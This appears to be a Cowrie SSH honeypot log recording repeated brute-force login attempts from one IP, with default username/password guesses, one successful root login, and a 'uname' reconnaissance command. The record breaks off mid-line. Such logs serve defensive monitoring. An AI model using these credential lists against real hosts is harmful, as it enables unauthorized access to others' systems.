{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51758,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdab8d4389ec","protocol":"ssh","message":"New connection: 212.227.125.160:51758 (1.2.3.4:22) [session: fdab8d4389ec]","sensor":"my-vps","timestamp":"2025-08-26T22:08:47.703995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:08:47.717322Z","src_ip":"212.227.125.160","session":"fdab8d4389ec"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:08:48.501081Z","src_ip":"212.227.125.160","session":"fdab8d4389ec"}
{"eventid":"cowrie.login.failed","username":"asterisk","password":"asterisk","message":"login attempt [asterisk/asterisk] failed","sensor":"my-vps","timestamp":"2025-08-26T22:08:48.660945Z","src_ip":"212.227.125.160","session":"fdab8d4389ec"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:49.736997Z","src_ip":"212.227.125.160","session":"fdab8d4389ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47146,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b243851520e","protocol":"ssh","message":"New connection: 212.227.125.160:47146 (1.2.3.4:22) [session: 9b243851520e]","sensor":"my-vps","timestamp":"2025-08-26T22:08:53.286461Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:08:53.287446Z","src_ip":"212.227.125.160","session":"9b243851520e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:08:53.344936Z","src_ip":"212.227.125.160","session":"9b243851520e"}
{"eventid":"cowrie.login.failed","username":"server","password":"server","message":"login attempt [server/server] failed","sensor":"my-vps","timestamp":"2025-08-26T22:08:53.492897Z","src_ip":"212.227.125.160","session":"9b243851520e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:54.705444Z","src_ip":"212.227.125.160","session":"9b243851520e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42532,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f060b89dffb","protocol":"ssh","message":"New connection: 212.227.125.160:42532 (1.2.3.4:22) [session: 9f060b89dffb]","sensor":"my-vps","timestamp":"2025-08-26T22:08:59.169274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:08:59.170214Z","src_ip":"212.227.125.160","session":"9f060b89dffb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:08:59.232117Z","src_ip":"212.227.125.160","session":"9f060b89dffb"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2w3e4r","message":"login attempt [root/1Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:08:59.519258Z","src_ip":"212.227.125.160","session":"9f060b89dffb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:08:59.687486Z","src_ip":"212.227.125.160","session":"9f060b89dffb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T22:08:59.688220Z","src_ip":"212.227.125.160","session":"9f060b89dffb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:59.767701Z","src_ip":"212.227.125.160","session":"9f060b89dffb"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:59.768848Z","src_ip":"212.227.125.160","session":"9f060b89dffb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37920,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c46b512bc79","protocol":"ssh","message":"New connection: 212.227.125.160:37920 (1.2.3.4:22) [session: 4c46b512bc79]","sensor":"my-vps","timestamp":"2025-08-26T22:09:04.206729Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:09:04.226507Z","src_ip":"212.227.125.160","session":"4c46b512bc79"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:09:04.259485Z","src_ip":"212.227.125.160","session":"4c46b512bc79"}
{"eventid":"cowrie.login.failed","username":"init","password":"init","message":"login attempt [init/init] failed","sensor":"my-vps","timestamp":"2025-08-26T22:09:04.515525Z","src_ip":"212.227.125.160","session":"4c46b512bc79"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:09:05.641171Z","src_ip":"212.227.125.160","session":"4c46b512bc79"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33308,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f0a5215a294","protocol":"ssh","message":"New connection: 212.227.125.160:33308 (1.2.3.4:22) [session: 6f0a5215a294]","sensor":"my-vps","timestamp":"2025-08-26T22:09:09.959158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:09:09.961952Z","src_ip":"212.227.125.160","session":"6f0a5215a294"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:09:10.012392Z","src_ip":"212.227.125.160","session":"6f0a5215a294"}
{"eventid":"cowrie.login.failed","username":"webserv","password":"webserv","message":"login attempt [webserv/webserv] failed","sensor":"my-vps","timestamp":"2025-08-26T22:09:10.218630Z","src_ip":"212.227.125.160","session":"6f0a5215a294"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:09:11.325028Z","src_ip":"212.227.125.160","session":"6f0a5215a294"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56930,"dst_ip":"1.2.3.4","dst_port":22,"session":"e27b0b573941","protocol":"ssh","message":"New connection: 212.227.125.160:56930 (1.2.3.4:22) [session: e27b0b573941]","sensor":"my-vps","timestamp":"2025-08-26T22:09:15.622764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:09:15.625728Z","src_ip":"212.227.125.160","session":"e27b0b573941"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:09:15.673759Z","src_ip":"212.227.125.160","session":"e27b0b573941"}
{"eventid":"cowrie.login.failed","username":"systemx","password":"systemx","message":"login attempt [systemx/systemx] failed","sensor":"my-vps","timestamp":"2025-08-26T22:09:15.889602Z","src_ip":"212.227.125.160","session":"e27b0b573941"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:09:16.942818Z","src_ip":"212.227.125.160","session":"e27b0b573941"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52316,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ab64825a5bd","protocol":"ssh","message":"New connection: 212.227.125.160:52316 (1.2.3.4:22) [session: 8ab64825a5bd]","sensor":"my-vps","timestamp":"2025-08-26T22:09:20.834477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:09:20.835287Z","src_ip":"212.227.125.160","session":"8ab64825a5bd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:09:20.885695Z","src_ip":"212.227.125.160","session":"8ab64825a5bd"}
{"eventid":"cowrie.login.failed","username":"rtelekom","password":"rtelekom","message":"login attempt [rtelekom/rtelekom] failed","sensor":"my-vps","timestamp":"2025-08-26T22:09:21.081722Z","src_ip":"212.227.125.160","session":"8ab64825a5bd"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:09:22.134146Z","src_ip":"212.227.125.160","session":"8ab64825a5bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47702,"dst_ip":"1.2.3.4","dst_port":22,"session":"719fe8b63fe4","protocol":"ssh","message":"New connection: 212.227.125.160:47702 (1.2.3.4:22) [session: 719fe8b63fe4]","sensor":"my-vps","timestamp":"2025-08-26T22:09:26.459075Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:09:26.473397Z","src_ip":"212.227.125.160","session":"719fe8b63fe4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:09:26.519391Z","src_ip":"212.227.125.160","session":"719fe8b63fe4"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:09:26.725846Z","src_ip":"212.227.125.160","session":"719fe8b63fe4"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:09:27.782571Z","src_ip":"212.227.125.160","session":"719fe8b63fe4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43090,"dst_ip":"1.2.3.4","dst_port":22,"session":"687eb48be9cf","protocol":"ssh","message":"New connection: 212.227.125.160:43090 (1.2.3.4:22) [session: 687eb48be9cf]","sensor":"my-vps","timestamp":"2025-08-26T22:09:32.403807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:09:32.404955Z","src_ip":"212.227.125.160","session":"687eb48be9cf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:09:32.458713Z","src_ip":"212.227.125.160","session":"687eb48be9cf"}
{"eventid":"cowrie.login.failed","username":"hennadii","password":"hennadii","message":"login attempt [hennadii/hennadii] failed","sensor":"my-vps","timestamp":"2025-08-26T22:09:32.648899Z","src_ip":"212.227.125.160","session":"687eb48be9cf"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:09:33.758250Z","src_ip":"212.227.125.160","session":"687eb48be9cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38480,"dst_ip":"1.2.3.4","dst_port":22,"session":"73d6a8764100","protocol":"ssh","message":"New connection: 212.227.125.160:38480 (1.2.3.4:22) [session: 73d6a8764100]","sensor":"my-vps","timestamp":"2025-08-26T22:09:38.098422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:09:38.099519Z","src_ip":"212.227.125.160","session":"73d6a8764100"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","r